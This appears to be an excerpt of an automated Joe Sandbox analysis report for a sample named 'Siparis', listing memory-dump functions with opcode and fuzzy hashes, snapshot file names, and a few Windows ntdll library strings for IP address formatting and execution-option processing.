Opcode ID: e520a5c9d8abaaa2e1084ede881032f1322e52a6f986fde4b17193abdded33f0
Instruction ID: bf8b09c509c3f9236e0f6997cafac986c3c71b67a15ec35ad024f8283631252a
Opcode Fuzzy Hash: e520a5c9d8abaaa2e1084ede881032f1322e52a6f986fde4b17193abdded33f0
Instruction Fuzzy Hash: 4890023224140903D1807158440464A100597E2341F95C016A0025655DCB258B5977A1

Function 01402B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09ca9f2adc533e0486b63293e4357c98656314368136584530c073a7a8f31f33
Instruction ID: bb8c78be9ee8cc63b442f9410d2a51f87c964764d3e47000cd80d6041a17268d
Opcode Fuzzy Hash: 09ca9f2adc533e0486b63293e4357c98656314368136584530c073a7a8f31f33
Instruction Fuzzy Hash: 6B90023224140903D10471584804686100597E1341F55C012A6024656ED77589917231

Function 01402BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12300a7cb22490f8fdddce0cb058a805813a14ea2a3e9906add610e7dd16d2cf
Instruction ID: fdcdc390c94d9d325dfaeb84ccc54928c44ced763cbded0d5f1a71ee877f281b
Opcode Fuzzy Hash: 12300a7cb22490f8fdddce0cb058a805813a14ea2a3e9906add610e7dd16d2cf
Instruction Fuzzy Hash: E290023264540903D15071584414746100597E1341F55C012A0024655DC7658B5577A1

Function 01402AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf60a734e12f73c3198fa0d8442f203c7e27d03d84c133334da38a95dd8cad58
Instruction ID: 1548043cd25e3c496ec6971297992c965a22a6968821c7e7417f5a5779af303b
Opcode Fuzzy Hash: cf60a734e12f73c3198fa0d8442f203c7e27d03d84c133334da38a95dd8cad58
Instruction Fuzzy Hash: 09900437351401030105F55C07045071047D7F73D1355C033F1015551CD731CD715331

Function 01402AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dce2c3b833ef8fbf3aba754f536c7b042df20ae9ce7158ac8be062e9c3680ba
Instruction ID: cabe3fa77221cff46d629abba59d3faf299ab4c10621a8fea69add8b22602dbf
Opcode Fuzzy Hash: 4dce2c3b833ef8fbf3aba754f536c7b042df20ae9ce7158ac8be062e9c3680ba
Instruction Fuzzy Hash: 5D900236261401030145B558060450B1445A7E7391395C016F1416591CC73189655321

Function 01402AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4228dfffa39847322d4149dbc39551a6b22d5eb7f5605ab3586c697d45ae7047
Instruction ID: 375fd4090fb29ef8df352c005772465d1109cc1aa9c33034f065bf37aa07353b
Opcode Fuzzy Hash: 4228dfffa39847322d4149dbc39551a6b22d5eb7f5605ab3586c697d45ae7047
Instruction Fuzzy Hash: BF9002B2241541934500B2588404B0A550597F1241B55C017E1054561CC73589519235

Function 01402D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b3ab00946c4c51c3ea7b263d7822cd1f202b5c949cc96eaf6913c85e1862ef6
Instruction ID: e5b7c01fef55e2366fdd99674ea132c6618cfe2f22267ccde8b22068091e69f4
Opcode Fuzzy Hash: 1b3ab00946c4c51c3ea7b263d7822cd1f202b5c949cc96eaf6913c85e1862ef6
Instruction Fuzzy Hash: 7C90023224544543D10075585408A06100597E1245F55D012A1064596DC7358951A231

Function 01402D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 896433f1107b2754a1a0f57f5676809ea844894eaadae09c2299c4bb64053d1d
Instruction ID: 1b9c0c36621e1d3996bea4497947375fd38333e1fb6a04e7fc622d340ff3ffa7
Opcode Fuzzy Hash: 896433f1107b2754a1a0f57f5676809ea844894eaadae09c2299c4bb64053d1d
Instruction Fuzzy Hash: E590023A25340103D1807158540860A100597E2242F95D416A0015559CCB2589695321

Function 01402D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76bd7e45e7d79707648f44085421f53d23733e2e605ba6fcf7ff0fa4300df735
Instruction ID: 522c8752c09cd5164ccf1536f49210b646aa6be1c17eceb458f75f70c36a49a9
Opcode Fuzzy Hash: 76bd7e45e7d79707648f44085421f53d23733e2e605ba6fcf7ff0fa4300df735
Instruction Fuzzy Hash: C590023234140103D140715854186065005E7F2341F55D012E0414555CDB2589565322

Function 01402DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5514ef60044d5db5b72c731d987cc8d93624f0ec8cf4bf9e126722cdef486d68
Instruction ID: 3f40ff2186eb0b3118fe3547cb646ec23860cf4eaa9c2dc9d86e9ce03ad62fc0
Opcode Fuzzy Hash: 5514ef60044d5db5b72c731d987cc8d93624f0ec8cf4bf9e126722cdef486d68
Instruction Fuzzy Hash: F7900232282442535545B15844045075006A7F1281795C013A1414951CC7369956D721

Function 01402DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae98d0e9979b425e4fbb0220dea5929027b32561bccbe5819996f072b935d7f
Instruction ID: 234f9c0f5eb1f00dc888dc03eb60505169b60423951cfd874bbc2da448afdaa7
Opcode Fuzzy Hash: dae98d0e9979b425e4fbb0220dea5929027b32561bccbe5819996f072b935d7f
Instruction Fuzzy Hash: 0390023228140503D141715844046061009A7E1281F95C013A0424555EC7658B56AB61

Function 01402C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a8b8f7a99765b2f152131ce415c889339ee0dd9017cec5246a83014eecbfc6
Instruction ID: 49ca4578bd164ce9f12869e0504d1a10231d34a48d045f889e8236664275aa33
Opcode Fuzzy Hash: 54a8b8f7a99765b2f152131ce415c889339ee0dd9017cec5246a83014eecbfc6
Instruction Fuzzy Hash: 2290023224140943D10071584404B46100597F1341F55C017A0124655DC725C9517621

Function 01402CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a26002031fe4394ee945867072fdd7a489fc7802efb4991f43c4df9d3d2678
Instruction ID: f3367611d60df3fecff0c03fd2bde337355448ef26fc3393805792262f6ae187
Opcode Fuzzy Hash: 01a26002031fe4394ee945867072fdd7a489fc7802efb4991f43c4df9d3d2678
Instruction Fuzzy Hash: 3090023264540503D14071585418706101597E1241F55D012A0024555DC7698B5567A1

Function 01402CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8467c779a751d2ac120cc80e85475852c58721cd34aba39c888ed500d55d868f
Instruction ID: 89959c69f35fc6e24a00104b36f13211e2fc65072f2eeea149c2b4a2f6246781
Opcode Fuzzy Hash: 8467c779a751d2ac120cc80e85475852c58721cd34aba39c888ed500d55d868f
Instruction Fuzzy Hash: C690023224140503D10071585508707100597E1241F55D412A0424559DD76689516221

Function 01402CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b39c2b7287852fd0fdc7bb884979b3e9290190e6d04bbea90572eebf29572f85
Instruction ID: 43b2d9cb4795b58262ed2ee34d596abaf65ed93231a7c9b69637e4fcb741c586
Opcode Fuzzy Hash: b39c2b7287852fd0fdc7bb884979b3e9290190e6d04bbea90572eebf29572f85
Instruction Fuzzy Hash: 5590023224140503D10075985408646100597F1341F55D012A5024556EC77589916231

Function 01402F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ac50ade3523e94e63a96b29c1691cdc33f1d90ea4cb4fe7360ba2dbd76f01e6
Instruction ID: f1f686e145a70448071902280856fa8e8d400daae5c339f216b659d7bc59aa26
Opcode Fuzzy Hash: 4ac50ade3523e94e63a96b29c1691cdc33f1d90ea4cb4fe7360ba2dbd76f01e6
Instruction Fuzzy Hash: 2C90047335140143D104715C44047071045D7F3341F55C013F3154555CC73DCD715335

Function 01402F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6841d602e845407787865cad4702d61a7e8af352806a4b658c0897796aa0492c
Instruction ID: 7044db132350196ca2b50814ffb66d85898693763e72429f7813fc9496afbb38
Opcode Fuzzy Hash: 6841d602e845407787865cad4702d61a7e8af352806a4b658c0897796aa0492c
Instruction Fuzzy Hash: 4D90027238140543D10071584414B061005D7F2341F55C016E1064555DC729CD526226

Function 01402FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc27906b7218e4a8d1a064f6f5e3e699a9b8d70919ea0875506ea75a5e4d8d66
Instruction ID: d6b6d08849250f1b94d7c2f8987a67ea603140320ca9a50966d4af7f48b0e1d7
Opcode Fuzzy Hash: dc27906b7218e4a8d1a064f6f5e3e699a9b8d70919ea0875506ea75a5e4d8d66
Instruction Fuzzy Hash: E3900232251C0143D20075684C14B07100597E1343F55C116A0154555CCB2589615621

Function 01402F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e5220aa160ae6b4d9c0157ad6add4938b45b3cbffeb8094095ac6ca5125988
Instruction ID: a8898b9220d4edcb65570764e9ac4021b76a17aabaeeff109c43ea48e5babb98
Opcode Fuzzy Hash: 89e5220aa160ae6b4d9c0157ad6add4938b45b3cbffeb8094095ac6ca5125988
Instruction Fuzzy Hash: 7B90023224180503D1007158481470B100597E1342F55C012A1164556DC73589516671

Function 01402FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41b29f71554afcc92a0960ff099880efb48fb5860e334b44e07ee0d44c518c95
Instruction ID: a3ef55af68a590522ff01f405807bc6e679d7601d99f9022c52acf99cb6f82aa
Opcode Fuzzy Hash: 41b29f71554afcc92a0960ff099880efb48fb5860e334b44e07ee0d44c518c95
Instruction Fuzzy Hash: 5D90023224180503D10071584808747100597E1342F55C012A5164556EC775C9916631

Function 01402FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 142646a65cf33eecc66ad1fe70eb5d4a00f752e64a58debd488a5c66a1b131d2
Instruction ID: d0627a55c2a1ed14816c9013f78afcc9e8cd49860bd7e204ae91c987ac04387c
Opcode Fuzzy Hash: 142646a65cf33eecc66ad1fe70eb5d4a00f752e64a58debd488a5c66a1b131d2
Instruction Fuzzy Hash: 38900232641401434140716888449065005BBF2251755C122A0998551DC76989655765

Function 01402E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 432c251dca223beca49b84dcea0875026470d0d2eff718ca47c2bfaf7888b4d4
Instruction ID: db8742fb5a9cb490437fae94822f60162f56f88bba5ccaccababdb32929d40c9
Opcode Fuzzy Hash: 432c251dca223beca49b84dcea0875026470d0d2eff718ca47c2bfaf7888b4d4
Instruction Fuzzy Hash: B590023234140503D102715844146061009D7E2385F95C013E1424556DC7358A53A232

Function 01402EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38658d12516c0b91b4597eb12721449b1ec65b894fad9d11d366e022f025b761
Instruction ID: d1f3d2046c65af61deacc458fc123a06cc875ca95e1a2d2deeaa5b530dcf3d0b
Opcode Fuzzy Hash: 38658d12516c0b91b4597eb12721449b1ec65b894fad9d11d366e022f025b761
Instruction Fuzzy Hash: F190027224180503D14075584804607100597E1342F55C012A2064556ECB398D516235

Function 01402E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c935dda799e67c600df2f65fb437478ff18bbb6c5c579e5d0fd07ac378048f1
Instruction ID: 8da44453a9cf573201e431319c8b3505ab468dc156c7ef5ab021d2475de1c07a
Opcode Fuzzy Hash: 3c935dda799e67c600df2f65fb437478ff18bbb6c5c579e5d0fd07ac378048f1
Instruction Fuzzy Hash: CD90023264140603D10171584404616100A97E1281F95C023A1024556ECB358A92A231

Function 01402EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7714217a5b27df9225f6a143fd713d73eb7f06dbb91145be1387d5d512abffde
Instruction ID: 1a7529b713ad4fa060e3ccf76ecd51942c4f65903fcc47ca45d2abf67ae34fdd
Opcode Fuzzy Hash: 7714217a5b27df9225f6a143fd713d73eb7f06dbb91145be1387d5d512abffde
Instruction Fuzzy Hash: 9B90027224140503D14071584404746100597E1341F55C012A5064555EC7698ED56765

Function 01403010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 646897c3b0fa07f7769b7c86b59e47c7fcc4e4ac4c75261c41efd5b9322dfebb
Instruction ID: c0026096de771a6da122a7436aa2cbff97c5b43931ab80df94ed1909890af42c
Opcode Fuzzy Hash: 646897c3b0fa07f7769b7c86b59e47c7fcc4e4ac4c75261c41efd5b9322dfebb
Instruction Fuzzy Hash: 2A90023224184543D14072584804B0F510597F2242F95C01AA4156555CCB2589555721

Function 01403090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec1edffa31e84f70313e5f86999a9abf496c5884d4a0d98846d23248cd530452
Instruction ID: 3b0fd88bd4b34213aa375bc96080c81e22473ea685477b0fcf4617f26d8d65ee
Opcode Fuzzy Hash: ec1edffa31e84f70313e5f86999a9abf496c5884d4a0d98846d23248cd530452
Instruction Fuzzy Hash: 0090023228140903D140715884147071006D7E1641F55C012A0024555DC7268A6567B1

Function 014039B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04121180f33a20a64c6415f4c1727ba39c7355654a10c24a25e630e9ab53431e
Instruction ID: 1fb66c23e9910f844f587f451c96ed7cf30a91fc257a4ecb0ba4dcb5ac4b72f9
Opcode Fuzzy Hash: 04121180f33a20a64c6415f4c1727ba39c7355654a10c24a25e630e9ab53431e
Instruction Fuzzy Hash: 0D90023228545203D150715C44046165005B7F1241F55C022A0814595DC76589556321

Function 01403D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91ced63cc1efc6c13bbfa1dec9529b34b692add3cb6b9628ccdb25e5d776c162
Instruction ID: 069899b276a35105e03a0ae04bb124b134a348d4529faefd2ad38999f7d07857
Opcode Fuzzy Hash: 91ced63cc1efc6c13bbfa1dec9529b34b692add3cb6b9628ccdb25e5d776c162
Instruction Fuzzy Hash: C190023624140503D51071585804646104697E1341F55D412A0424559DC76489A1A221

Function 01403D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ef52daa171f6270bfed175c32280bb2e3ef3dd00812ac7ceb0aecfc037cdb4
Instruction ID: cfc260df375588eb38d1324964b0e0b00ed08b33310d4e5f621173f85773d7e5
Opcode Fuzzy Hash: d0ef52daa171f6270bfed175c32280bb2e3ef3dd00812ac7ceb0aecfc037cdb4
Instruction Fuzzy Hash: CA90023224240243954072585804A4E510597F2342B95D416A0015555CCB2489615321

Function 01402C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 7e435593331c31e2487d12b4edeaabfe68a0aecdc95483d328937bc1cd29685c
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01402890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0140293C
___swprintf_l.LIBCMT ref: 0140295E
___swprintf_l.LIBCMT ref: 014029A3
___swprintf_l.LIBCMT ref: 0143A52E

Strings

:%u.%u.%u.%u, xrefs: 0143A5B8
::ffff:0:%u.%u.%u.%u, xrefs: 0143A54E
::%hs%u.%u.%u.%u, xrefs: 0143A527
ffff:, xrefs: 0143A504

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 49b76da480f514bd446ec6b15101aa0300ef02b93a962733fe7bf915a812d5c1
Instruction ID: a6cc80d9846b394ae7afeb41e85ad65c9ce7c92426e7ffe14f82b43fa3666535
Opcode Fuzzy Hash: 49b76da480f514bd446ec6b15101aa0300ef02b93a962733fe7bf915a812d5c1
Instruction Fuzzy Hash: F351D6B6A00116AFCB12DBAE888497FFBB8BB58240714827BF595D77D1D374DE4087A0

Function 01472410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 014724A6
___swprintf_l.LIBCMT ref: 014724E2
___swprintf_l.LIBCMT ref: 0147257D
___swprintf_l.LIBCMT ref: 014725A3
___swprintf_l.LIBCMT ref: 014725C8
___swprintf_l.LIBCMT ref: 01472608

Strings

:%u.%u.%u.%u, xrefs: 014725FF
::ffff:0:%u.%u.%u.%u, xrefs: 014724DA
ffff:, xrefs: 0147247D, 0147249D
::%hs%u.%u.%u.%u, xrefs: 0147249E

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: e0b4a6baa46ebcc549cbf02f02661f93cef8898cacdc634932529adfb82ecadd
Instruction ID: da1ae24db3dcb9b4f74c1a31ed86126cba0116bfb9616e1829e90df5400e0691
Opcode Fuzzy Hash: e0b4a6baa46ebcc549cbf02f02661f93cef8898cacdc634932529adfb82ecadd
Instruction Fuzzy Hash: 16510471A00656AFCB30DE6DC990CBFBBF8EB44204B04846FF596D3751E6B4EA408760

Function 013F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01434655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01434742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014346FC
ExecuteOptions, xrefs: 014346A0
Execute=1, xrefs: 01434713
CLIENT(ntdll): Processing section info %ws..., xrefs: 01434787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01434725

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 998db7534a9ab5c95a7be3bdcfbba081f605bfeba3ae2c43fa1aca71aa553646
Instruction ID: 0452f467690784adda0763b38d85cd7a7fb037e1fd3373d909a9f550bf0f900d
Opcode Fuzzy Hash: 998db7534a9ab5c95a7be3bdcfbba081f605bfeba3ae2c43fa1aca71aa553646
Instruction Fuzzy Hash: AC51FB316002197BEF21ABA9DC85FFE77A8EF68318F1400AED705A72E1D7719A458F50

Function 0140B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0140B6BF

Strings

0, xrefs: 0140B66F
-, xrefs: 0140B650
+, xrefs: 0140B65A
0, xrefs: 0140B695

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: bf3a9544959f8e46695f379e45b07e42938a691d98b4a78b1f7fa165ded2c53e
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: B681C238E012498EEF2B8E6EC8507BE7BB1EF95310F18453BD851A73F1C63489418B59

Function 014720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0147214F
___swprintf_l.LIBCMT ref: 01472172

Strings

[, xrefs: 0147212B
]:%u, xrefs: 01472169
%%%u, xrefs: 01472146

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 8bfee4fd5d040fd4d7f450c943794305e78a28ab8fa99f0bc496df701728b3d9
Instruction ID: aedc332a73b2710ed740c99d5d8213cf055be7a1af3284598df3e023855f3d0b
Opcode Fuzzy Hash: 8bfee4fd5d040fd4d7f450c943794305e78a28ab8fa99f0bc496df701728b3d9
